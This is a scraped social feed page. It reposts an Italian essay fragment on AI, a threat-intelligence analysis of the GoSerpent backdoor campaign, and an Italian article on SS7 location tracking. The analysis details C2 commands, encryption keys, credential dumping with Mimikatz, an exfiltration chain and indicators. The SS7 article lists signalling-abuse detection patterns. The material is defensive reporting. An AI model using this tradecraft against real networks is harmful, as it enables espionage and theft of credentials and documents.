Criminale perché, solo un criminale può delirare del bisogno di Gigawattora di energia in un pianeta dove il cambiamento climetico richiede di mettere il risparmio energetico e la riduzione di emissioni in cima alle priorità.

pausa

OK, dove ci porta tutto questo? Voglio impedire a Alex o a chiunque di usare la sua Intelligenza Artificiale generativa?

Quello che spero è che smettiamo di usarla senza avere chiaro in testa quali interessi porta avanti, e che quegli interessi non sono di noi che la usiamo. In altri tempi si sarebbe detto che è necessario sviluppare una coscienza di classe.

È un lessico che non mi è mai appartenuto ma, come dicevamo prima, il valore di un argomento sta nell'argomento, non nella modalità di presentazione.

Quindi sì, è ora che sviluppiamo una coscienza di classe.

E, dopo averlo fatto, che ne traiamo le conseguenze.


Questa voce è stata modificata (1 mese fa)
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Regno Unito: una nuova legge propone di disattivare i social di notte per i più giovani

📌 Link all'articolo : redhotcyber.com/post/regno-uni…

A cura di Carolina Vivianti

#redhotcyber #news #regnounito #socialmedia #sicurezzainternet #restrizioninotte #utentiminori #instagram #tiktok

GoSerpent: a persistent threat evolves with sophisticated data collection and exfiltration


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


In February 2026 we discovered a set of malicious activities that have been ongoing since late 2025. These activities involved a RAT module written in Go with proxy capabilities, serving as the main stage of the attack. The attack targeted government and diplomatic entities in Southeast Asia and showed a level of sophistication which caught our attention.

During the attack, the main malware, dubbed GoSerpent, received an encrypted argument and started communication with a remote server. It was also used to deploy further malicious tools for sensitive data collection and credential dumping on the system.

Monitoring the activities of this threat actor revealed that in May 2026 they came back with an evolved set of malicious tools: new Stowaway RAT and proxy tool which resembled the initial malware as well as an additional stealthy tool to exfiltrate sensitive data collected for the previous few months through network share.

We found earlier versions of the GoSerpent backdoor used since 2021 against victims in Southeast Asia with a relatively simpler code that received command-line arguments in plain text. Even though the newer variant is stealthier, the attackers continued using the simpler version alongside the latest one in their recent attacks.

What makes this threat particularly concerning is the strategic deployment of various tools with sophisticated data collection and exfiltration capabilities.

In this article we introduce the malicious tools uncovered by us which are used since late 2025.

Technical details

Initial phase of the attacks


The initial phase of the attacks involved deployment of the GoSerpent backdoor and subsequent deployment of additional malicious tools. During this phase, the main goal was to collect sensitive files and store them for future exfiltration which was done by a data collecting tool, ThumbcacheService. The attackers also needed system credentials for the collected data exfiltration through network shared drives at a later stage. This was achieved by a number of credential dumping tools deployed in this phase via the GoSerpent backdoor.

GoSerpent backdoor


The primary weapon in this campaign is the GoSerpent backdoor, a sophisticated Go-based remote access Trojan that has been active since at least 2021, with the most recent variant deployed in 2026.

This malware receives encrypted and base64-encoded command-line arguments containing the C2 server address and communication password, which are decrypted using AES-CBC mode with a fixed IV (31323334353637383930616263646566) and keys derived from predefined strings.

The backdoor connects to command-and-control servers using ChaCha20 encryption for communications, with the SHA256 hash of the communication password serving as the encryption key.

GoSerpent supports multiple C2 commands by receiving special command values. The commands include the following:

CommandSymbol (as derived from corresponding function names)Description
2BA1SyncRespond to the server to show the infection is active
3BA2ExitExit process
4BA3LsStart listening on a port
5BA4ConnectConnect to a remote server
6BA5HelloCreate a shell on the infected machine
7BA6UlUpload a file or directory to the server
8BA7DlDownload from the server
9BA8Ss5Start a SOCKS5 proxy on the infected machine
ABA9ClClose a listening port
CBABRFForward to a connected node

GoSerpent can establish SOCKS5 proxy servers to route traffic through compromised hosts, enabling attackers to access other networks while masking their true IP addresses. The backdoor is capable of deploying additional malicious tools including ThumbcacheService for file collection, Mimikatz for credential dumping, and QuarksDumpLocalHash for local account password hash extraction. The malware exhibits strong persistence mechanisms and uses filenames that mimic legitimate system processes such as lass.exe and updates.exe to evade detection.

McMx RAT


McMx is a basic Go-based proxy and remote access tool that represents a simpler variant of the GoSerpent backdoor, appearing to be compiled from a different GitHub repository path.

Unlike the latest variant of GoSerpent that uses encrypted command-line arguments, McMx receives input parameters from text files in plain text format, resembling older versions of GoSerpent. The malware features similar function names with apparent typos present in both tools.

Before executing McMx, attackers manipulate batch files to generate configuration files containing C2 parameters. The patterns observed show the use of echo commands to create configuration files with parameters like remote host addresses, ports, and secret keys. The McMx malware is then deployed with this configuration.

The tool shares core functionalities with GoSerpent including:

  • SOCKS5 proxying
  • port forwarding
  • file transfer
  • remote shell capabilities


Data collection and credential dumping tools


Following initial deployment of the GoSerpent backdoor, attackers typically wait several days before utilizing it to download and execute additional malware components for data collection and credential dumping.

ThumbcacheService


ThumbcacheService is a malicious DLL deployed as a Windows service that functions as a sophisticated file collection mechanism within the GoSerpent ecosystem. The malware employs XOR encryption with a single-byte key of 0x13 for string obfuscation. It decrypts embedded strings and creates a database file named thumbcache_605a.db in the C:\Users\Public\ directory to store collected sensitive files. It specifically targets documents with the following extensions: .doc, .docx, .pdf, .xls and .xlsx.

The targeted files are then archived using 7-Zip and protected with a predefined password of @vx0a9n5W2M0c3D6.#, enforcing a 20MB size limit for archives.
The malicious service also monitors the $Recycle.Bin directory for deleted files with the extensions of interest, ensuring comprehensive data collection.

Credential dumping tools


The threat actor deploys the following tools via GoSerpent backdoor to dump credentials:

  1. Mimikatz — dumps memory from the LSASS process to extract credential material, including cached credentials and Kerberos tickets.
  2. QuarksDumpLocalHash — extracts local account password hashes from the SAM registry hive, allowing for offline password cracking attacks.

These tools work together to maximize information extraction from compromised systems. The stolen credentials were used in later stages of the attack to facilitate the exfiltration of sensitive files collected by ThumbcacheService.

Second stage of the attacks


After the initial phase of the malware deployments, the attackers allowed a few weeks for the ThumbcacheService to silently collect sensitive files without exfiltrating them. In the meantime, the credential dumping tools also continued to steal credentials. In May 2026, the threat actor came back with a set of new tools. The main malware of this round of activities was another Go-based RAT and proxy tool, Stowaway. It was then used to deploy the two-stage data exfiltration tool TmcLoader/TmcPayload which was the last piece of the data theft puzzle.

Stowaway


Stowaway is a proxy and remote access tool compiled from an open-source framework with customized functions to make the infection more stealthy. This malware features both network admin and agent capabilities enabling attackers to establish chained proxy paths across multiple hosts with the following functionalities:

  • SOCKS5 proxying
  • port forwarding
  • reverse tunneling
  • remote shell access
  • file transfer
  • SSH-based tunneling

Communications are transported over TCP, HTTP, or WebSocket channels with protection using AES-256-GCM or TLS encryption.
As the next step, the attackers deliver two files to the victim machine via Stowaway:

  • TmcLoader with embedded payload
  • {BBF061R2-BE25-4F6D-8B2D-1A6A39C3FSA2}.db — an encrypted configuration file


TmcLoader/TmcPayload


TmcLoader is a stealthy C++ loader module registered as a Windows service. The malware embeds an encrypted payload dubbed TmcPayload within its .data section, which is decrypted and loaded into the memory space of the svchost process to maintain persistence and avoid detection.

TmcLoader employs dynamic API resolution through a circular XOR encryption where each byte is XORed with the value of the subsequent byte, combined with Base64 encoding for string obfuscation to hide API names.

The loader creates a unique event to prevent multiple infections on the same system. After that, it extracts and decrypts the embedded TmcPayload. This payload component is responsible for exfiltrating sensitive data from the victim’s machine.

TmcPayload generates a file path from an obfuscated string: C:\Users\Public\Libraries\{BBF061R2-BE25-4F6D-8B2D-1A6A39C3FSA2}.db.

It then checks for the existence of this configuration file. If the file doesn’t exist, it delays execution for a random time before rechecking. The configuration file contains encrypted network share credentials and destination paths for data exfiltration, specifically referencing the thumbcache_605a.db file created by ThumbcacheService as the file to be exfiltrated, demonstrating the integrated nature of the attack chain.

Toolset integration


What distinguishes this threat actor’s approach is the deliberate integration between different components of their toolset. The chain from ThumbcacheService to TmcLoader/TmcPayload demonstrates sophisticated operational planning:

  1. ThumbcacheService: deployed via GoSerpent, collects and archives sensitive files into the thumbcache_605a.db database file.
  2. Credential dumping tools: deployed via GoSerpent to retrieve system credentials.
  3. Configuration file: delivered via Stowaway, contains credentials and file paths for data exfiltration.
  4. TmcLoader/TmcPayload: deployed via Stowaway, reads configuration file for data exfiltration.
  5. Data transfer: using network credentials and destination paths from the configuration file, TmcPayload transfers the exact same thumbcache_605a.db.

This integration shows that the threat actors have carefully orchestrated their tools to work together seamlessly, ensuring that data collected by one component is available for exfiltration by another component.

Infrastructure


The malware operators leverage legitimate hosting providers including Alibaba Cloud and UCLOUD HK for their command-and-control infrastructure. The use of legitimate hosting platforms demonstrates operational security awareness, making detection more challenging.
The technical similarities between GoSerpent and the newer Stowaway tools strongly suggest the threat actor’s deep familiarity with network proxy technologies. The consistent use of legitimate domain names as secret keys, with GoSerpent employing www.microsoft.com and www.spacex.com and Stowaway utilizing github.code, indicates a standardized operational methodology.

Attribution


While the exact attribution of the GoSerpent campaign remains uncertain, there are indications of a potential link to the TetrisPhantom threat actor. The similarities in victim targeting, technical capabilities, and operational methodologies suggest a possible connection. However, further investigation is necessary to confirm this association.

Conclusion


The GoSerpent campaign represents a sophisticated and evolving threat to government and diplomatic entities in Southeast Asia. The threat actor’s use of customized tools, such as the GoSerpent backdoor, Stowaway, and TmcLoader, demonstrates a high degree of technical expertise and operational planning. The integration of these tools to collect and exfiltrate sensitive data highlights the actor’s focus on long-term access and intelligence gathering. As the threat landscape continues to shift, it is essential for organizations to remain vigilant and implement robust security measures to detect and prevent such attacks. By understanding the tactics, techniques, and procedures (TTPs) employed by this threat actor, defenders can better prepare themselves to counter similar threats in the future.

Indicators of compromise

File hashes


GoSerpent
EBFFD5A76AAA690BCDB922F82E0BACC5
DC506FF7BB72735444FB3703A6BEE6D8

McMx
D6E86BF8A90E9B632ADD5FA495F97FBC

ThumbcacheService
CB6C4C70A3B171FA3404B8E1A3382116
64E9D1950E42BC98486DFD9919463D1C

Stowaway
CBBB6D483737EA3566726E51752DFF40
7F223EE0716CE2AD56F55D3744419449
19F8BEFCB035F52BF70094E6B4F5779A
846EF7C1C7323849B2A778C5E4CDA162

TmcLoader
D08A059E8B815E3B891505BC8777FC28
93A1569D5D5AB2C4761FEDF84F83709E

C2 IP addresses


152.32.160[.]239
8.220.194[.]108
8.220.214[.]132
8.220.209[.]155
8.220.193[.]189
101.36.104[.]87
144.48.6[.]46
103.138.13[.]30
47.80.22[.]58
152.32.222[.]113
43.106.30[.]226


securelist.com/goserpent-backd…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

The media in this post is not displayed to visitors. To view it, please go to the original post.

✨ SS7, il protocollo del 1970 che ha tradito i soldati USA: come l’Iran ha tracciato le truppe americane in Medio Oriente
#CyberSecurity
insicurezzadigitale.com/ss7-il…

@informatica


SS7, il protocollo del 1970 che ha tradito i soldati USA: come l’Iran ha tracciato le truppe americane in Medio Oriente


Mentre i missili iraniani cadevano sulle basi americane in Iraq e Bahrain nella primavera del 2026, qualcun altro stava già facendo il lavoro sporco a monte: individuare dove dormivano, mangiavano e lavoravano i soldati statunitensi. Non con un drone o un informatore, ma con un protocollo di telecomunicazioni progettato negli anni ’70 per instradare chiamate tra centrali telefoniche. Un’indagine del progetto no-profit Mobile Surveillance Monitor, ripresa dal Financial Times e da TechCrunch, sostiene che Teheran abbia sfruttato sistematicamente le debolezze di SS7 per tracciare il personale militare USA in Medio Oriente prima e durante il conflitto con Israele e Stati Uniti.

Un protocollo vecchio quanto la Guerra Fredda tecnologica


Signaling System 7 (SS7) è l’infrastruttura di segnalazione che dagli anni ’70 permette agli operatori di rete 2G e 3G di scambiarsi informazioni su instradamento di chiamate, SMS e roaming. Il problema è noto da oltre un decennio agli specialisti di sicurezza delle telecomunicazioni: SS7 si basa su un modello di fiducia reciproca tra operatori che non prevede autenticazione robusta tra le reti. Chiunque abbia accesso — legittimo o comprato sul mercato grigio della sorveglianza — a un nodo SS7 può inviare query di tipo “Send Routing Information” (SRI) per ottenere la cella a cui è agganciato un numero di telefono, ottenendo così una localizzazione approssimativa del dispositivo, ovunque nel mondo, senza che l’utente se ne accorga.

È la stessa classe di debolezza usata in passato da broker di sorveglianza commerciale e da servizi di intelligence per intercettare SMS di autenticazione a due fattori o localizzare dissidenti. Ciò che rende il caso iraniano rilevante non è la tecnica in sé, già documentata, ma la scala e il tempismo: un uso operativo in tempo di guerra, contro obiettivi militari di una potenza nucleare.

La scoperta: un’impennata di query SS7 nel Golfo


Gary Miller, ricercatore che ha fondato Mobile Surveillance Monitor e collabora con il Citizen Lab dell’Università di Toronto, ha rilevato un’impennata anomala di “SS7 ping” — richieste ripetute di localizzazione — su reti di telecomunicazione di diversi paesi mediorientali. L’attività sarebbe iniziata a ridosso dell’operazione aerea congiunta USA-Israele contro i siti nucleari iraniani, per poi intensificarsi nei primi giorni del conflitto, quando l’Iran ha lanciato missili e droni contro le posizioni americane nella regione.

I segnali intercettati indicherebbero un interesse mirato per numeri associati a basi militari e hotel utilizzati da personale e contractor statunitensi in Iraq, Bahrain e altri paesi della regione — non una raccolta indiscriminata, ma query concentrate su specifiche fasce numeriche e reti locali note per essere frequentate da soggetti occidentali.

Non solo SS7: l’ad-tech come arma di sorveglianza


Il report segnala un secondo livello di raccolta, complementare a SS7: l’uso di tecnologie pubblicitarie commerciali (l’ecosistema RTB, “real-time bidding”) per identificare smartphone tramite advertising ID (IDFA/GAID) e correlarli, attraverso data broker, a posizioni geografiche precise. È la stessa superficie di rischio già segnalata da anni riguardo alla possibilità per chiunque compri dataset pubblicitari di ricostruire pattern di movimento di individui specifici — qui però applicata, secondo i ricercatori, a fini di targeting militare in un teatro di guerra attivo.

La combinazione delle due tecniche — segnalazione telefonica di rete e dati pubblicitari commerciali — rappresenta un salto di sofisticazione rispetto alle classiche operazioni SS7 isolate: un attore statale che integra fonti SIGINT tradizionali con l’enorme mole di dati commerciali normalmente destinata al marketing.

Timeline essenziale


  • Fine febbraio 2026: primo aumento rilevato delle query SS7 sospette, in coincidenza con l’avvio della campagna aerea USA-Israele contro l’Iran.
  • Marzo-aprile 2026: intensificazione del tracciamento durante lo scambio di attacchi missilistici e con droni contro le posizioni statunitensi in Iraq e Bahrain.
  • 14 luglio 2026: pubblicazione del report da parte del Financial Times, ripreso da TechCrunch, Security Boulevard e altre testate di settore.


Due righe per i difensori


Per chi si occupa di sicurezza delle telecomunicazioni e di protezione del personale ad alto rischio (militari, diplomatici, giornalisti in zone di conflitto, dirigenti esposti), il caso ribadisce alcuni punti che il settore conosce ma fatica a far diventare prassi diffusa:

  • Le difese SS7 lato operatore (firewall di segnalazione, filtri su messaggi SRI-SM/PSI provenienti da reti non attendibili) restano disomogenee a livello globale, specialmente in aree di conflitto dove la cooperazione tra operatori è debole.
  • Il personale ad alto rischio dovrebbe evitare la SIM del proprio operatore domestico quando si muove in teatri sensibili, preferendo dispositivi dedicati, SIM locali “pulite” o soluzioni di comunicazione satellitare/crittografata che non transitano su rete 2G/3G tradizionale.
  • La disattivazione del roaming 2G/3G e l’uso forzato di reti 4G/5G con autenticazione più robusta riduce, senza eliminarla, l’esposizione a query SS7 (il 4G usa Diameter, comunque non immune da abusi simili).
  • Gli advertising ID dei dispositivi militari o di personale sensibile dovrebbero essere disattivati o randomizzati sistematicamente, e le app non essenziali rimosse prima di operazioni in teatri a rischio.

Il caso si inserisce in un pattern più ampio: dal 2014 a oggi, ricercatori indipendenti e vendor di sicurezza mobile hanno ripetutamente dimostrato che SS7 resta uno dei punti ciechi più sottovalutati della sicurezza nazionale, proprio perché la sua debolezza non risiede in un bug patchabile ma nell’architettura stessa di fiducia tra operatori, difficile da riformare su scala globale in tempi brevi.

Indicatori e pattern di rilevamento


Non essendo un malware ma un abuso di protocollo, non esistono IoC nel senso classico. I pattern che i team SOC delle telco e i CERT dovrebbero monitorare includono:

# Pattern di rilevamento abuso SS7 (indicativi, non esaustivi)
- Volume anomalo di messaggi SRI / SRI-SM verso uno stesso MSISDN o range di MSISDN
  in un intervallo di tempo ristretto (query ripetute = tentativo di tracciamento continuo)
- Richieste PSI (Provide Subscriber Info) o ATI (Any Time Interrogation) originate
  da Global Title esterni non associati a roaming legittimo dell'abbonato
- Origine dei messaggi SS7 da reti GT (Global Title) storicamente associate
  a broker di sorveglianza o a operatori "shell" con traffico legittimo minimo
- Correlazione temporale tra query SS7 e attivazione di advertising ID
  dello stesso dispositivo in piattaforme RTB di terze parti
- Assenza di firewall SS7/SIGTRAN conforme alle raccomandazioni GSMA FS.11 e FS.19

La GSMA pubblica da anni linee guida (FS.11, FS.19) per il filtraggio del traffico di segnalazione: la loro adozione disomogenea, soprattutto fuori dai mercati occidentali, resta il vero tallone d’Achille che un attore statale come l’Iran può — e a quanto pare sa — sfruttare con costi minimi e attribuzione tutt’altro che scontata.